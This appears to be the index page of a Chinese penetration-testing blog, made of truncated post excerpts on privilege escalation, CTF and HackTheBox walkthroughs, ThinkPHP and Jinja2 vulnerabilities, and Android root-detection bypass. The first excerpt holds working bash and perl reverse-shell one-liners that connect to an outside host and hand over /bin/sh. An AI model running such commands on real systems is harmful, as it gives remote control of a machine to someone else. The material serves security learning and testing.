前言 记录一些Linux下反弹Shell的姿势，本文转载自互联网。 内容 bash版本 1 bash -i >& /dev/tcp/www.icekam.com/8080 0>&1 perl版本 1 perl -e 'use Socket;$i="www.icekam.com";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'&1 python版本 1 python -c 'import

前言 很久不玩提权了，练练手。 原理 udf = ‘user defined function‘，即‘用户自定义函数’。 文件后缀为‘.dll’，常用c语言编写。 通过在ud

前言 前段时间购入了VIP，工作原因一直没来得及练手。 近期我将由简到难，争取把Hackthebox的靶机都过一遍。 信息搜集 老规矩，扫一波。 PORT STATE

前言 继续练，前期计划每天四个简单的。 信息搜集 老规矩，扫一波。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40

Linuxprivchecker 简介 Linuxprivchecker.py - Linux权限升级检查脚本 [作者]：Mike Czumak（T_v3rn1x） 此脚本旨在在Linux机器上本地执行，以枚举基本系统信

介绍 Jinja2是一个现代的，设计师友好的Python模板语言，以Django的模板为蓝本。 使用可选的沙盒模板执行环境，它具有快速，广泛使用

介绍 Zabbix是一个开源监控软件工具，适用于各种IT组件，包括网络，服务器，虚拟机和云服务。 Zabbix提供监控指标，其中包括网络利用率，

介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkP

介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkP

介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkP

信息搜集 寻找目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 $ nmap -sS 10.0.2.1/24 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 12:22 CST $ nmap -A 10.0.2.7 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16

简介 鲍勃是我的第一个CTF虚拟机，如果它不完美的话我就这么容易。 Milburg Highschool服务器刚被攻击，IT人员已经关闭了他们的Windows

前言 Android渗透测试，最关键的第一步就是过应用的Xposed/root检测。 这个属于比较初期的防检测方式了，不过很有参考意义！ 环境 系统